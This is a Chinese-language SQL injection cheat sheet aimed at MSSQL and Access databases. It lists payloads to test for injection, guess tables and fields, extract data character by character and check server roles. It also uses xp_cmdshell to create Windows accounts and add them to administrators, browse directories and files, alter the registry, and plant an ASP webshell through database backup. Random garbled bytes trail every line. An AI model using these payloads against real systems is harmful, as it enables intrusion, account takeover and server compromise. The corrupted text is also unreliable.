1.判断是否有注入;and 1=1 ;and 1=2 �<>6j>�w_|
2.初步判断是否是mssql ;and user>0 Y(Oh7VwY*P
H�oPpUq5,
3.注入参数是字符'and [查询条件] and ''=' �f�3O6�&1D
�oz�&`�3`
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 6:5K�?Y�o�
�)R7Sh5�1P
5.判断数据库系统 C6�)Y�ZC�
~&RTLr#\*M
;and (select count(*) from sysobjects)>0 mssql �-'�Z Gc8)
.I:�rb~��&
;and (select count(*) from msysobjects)>0 access >�[ ��B.y
s#D�j>Fej�
r,;c�a6>5H
7I;kh`H$(f
6.猜数据库 ;and (select Count(*) from [数据库名])>0 (H_dZ���L�
'?C�6P5�fm
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 7Bj,{9�^aJ
M�hN;GM�H
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��I/7!5�Z*
t^�'nh
�1=
9.(1)猜字段的ascii值(access) 2u$-(�JfoS
,)`_?^�\$f
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 %}@�iz(*}>
i >���3`V6
(2)猜字段的ascii值(mssql) �?W'z�5�'|
nkH�l;�;WJ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 !R8%C!=�a
R&|.Lvmc/�
10.测试权限结构(mssql) L3{(�B���u
2Wzx1_D�"a
HTh?�&u\QG
�>W>�rh�xU
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- }r�,M�(�Zr
��h:fiUC�w
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- [e��><^R*u
9�d"*Z%!j�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 5e7Y�M@n�g
ox��&5}�&\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 3%*igpj�\)
z���3a�GK�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5O�d%Jh�tt
PI�H\*2�\/
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1h@qcom9K_
@JG�m��OwZ
;and 1=(select IS_MEMBER('db_owner'));-- 4�vg�3F(��
:$D*ab^^P�
ehW�[LRt�q
�qcs)��
�p
11.添加mssql和系统的帐户 �_UV�pQ5pN
8C{&i5kj\E
;exec master.dbo.sp_addlogin username;-- �UPH#~��D!
;exec master.dbo.sp_password null,username,password;-- .,�u>WIUxj
OQum�A���j
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- e�u5te�0{G
�KSs1EmB��
;exec master.dbo.xp_cmdshell 'net user username password rf��0Z5��.
<)Z�Q�RE@
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- |5vc�T,��A
q=�3>ij�{v
;exec master.dbo.xp_cmdshell 'net user username password /add';-- D�=ej%]@iw
Mqr]e�#"o�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �O}"o�z3H�
yx8�G9�SO?
PMP{|�yEx"
1"y��!wsM%
12.(1)遍历目录 9p�8ajlYg,
^8�&}Nk[�j
;create table dirs(paths varchar(100), id int) ���U�C+Qn�
�jV2H�61d�
;insert dirs exec master.dbo.xp_dirtree 'c:\' d�>f;�N+O%
/<-P�W9�X?
;and (select top 1 paths from dirs)>0 �!*�v%�
s�
O�H@"]�Nc~
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 44e]sT��.B
k^�}[+�IFJ
�-f�|/�#1�
SNqSp.>-U"
(2)遍历目录 �1NP����
��<PSz`)SN
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �L�c�~m`=B
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 x��/<o�w4C
mW{;$@PLF"
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��N[
=��I
JA4��Zg*7I
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 i$y=tJehi
bkJ� bnW=�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �.6�gx|�V+
��,�t� 2CQ
-o�+�t�&m
P'��VHg��a
13.mssql中的存储过程 �)>M�L7y��
&��m--��}�
xp_regenumvalues 注册表根键, 子键 ��l-w4E"n3
3}}/,p�GSc
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �eY�3:Nl�^
�]L~�z9��)
xp_regread 根键,子键,键值名 IX+J�f? &^
nC3+�Zk��a
;exec xp_regread wwl,F=�| Y
�)�.kU7;0
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 x[t?�h�l=:
"22./vWV|i
xp_regwrite 根键,子键, 值名, 值类型, 值 R"OT&:0/��
`&N�Fl'l1C
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 v�����.�W!
��"5�eD
>!
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 lB�27Z}���
oI��-F�r0!
xp_regdeletevalue 根键,子键,值名 &m5^
�YN$b
L@\�t�]
�~
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 W,~*pyL�dO
W^el�zN�(
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ����W\�[�E
^�U~Er'mT
E{��6ku=2F
k?h�{��6Qd
14.mssql的backup创建webshell �`G��":y[Q
\�zJ�^X�pC
use model s�A6Hk�B.
?e�-r�wa�W
create table cmd(str image); No\#N/1�@P
(���&�m�1*
insert into cmd(str) values (''); )%jS9e�{d�
�L\ysy2E0�
backup database model to disk='c:\l.asp'; �q[/g3D\G
�_dd_Z40�R
IRM jL��.q
%en�J[a%Qg
15.mssql内置函数 <@`K�^g;�W
~6#mVP5sU)
;and (select @@version)>0 获得Windows的版本号 �s;h��`�n$
S*}GW-)�oA
;and user_name()='dbo' 判断当前系统的连接用户是不是sa =3,<(�F5Y[
c�Mi�9 Z]
;and (select user_name())>0 爆当前系统的连接用户 �|g7)A?2J~
NH/jkt&�F[
;and (select db_name())>0 得到当前连接的数据库 ?bd!JW bg`
4oF,;o+v\4
36�'J�9h�\
�rKP�sv�*w
16.简洁的webshell 2;]tIt��d1
lJa���-�O�
use model toF6�� �Z
'NWvQ�R<�X
create table cmd(str image); w32F��?78]
�Ak�joD7.*
insert into cmd(str) values (''); h�1>.w�
pr
�p�,�W�BF
backup database model to disk='g:\wwwtest\l.asp';
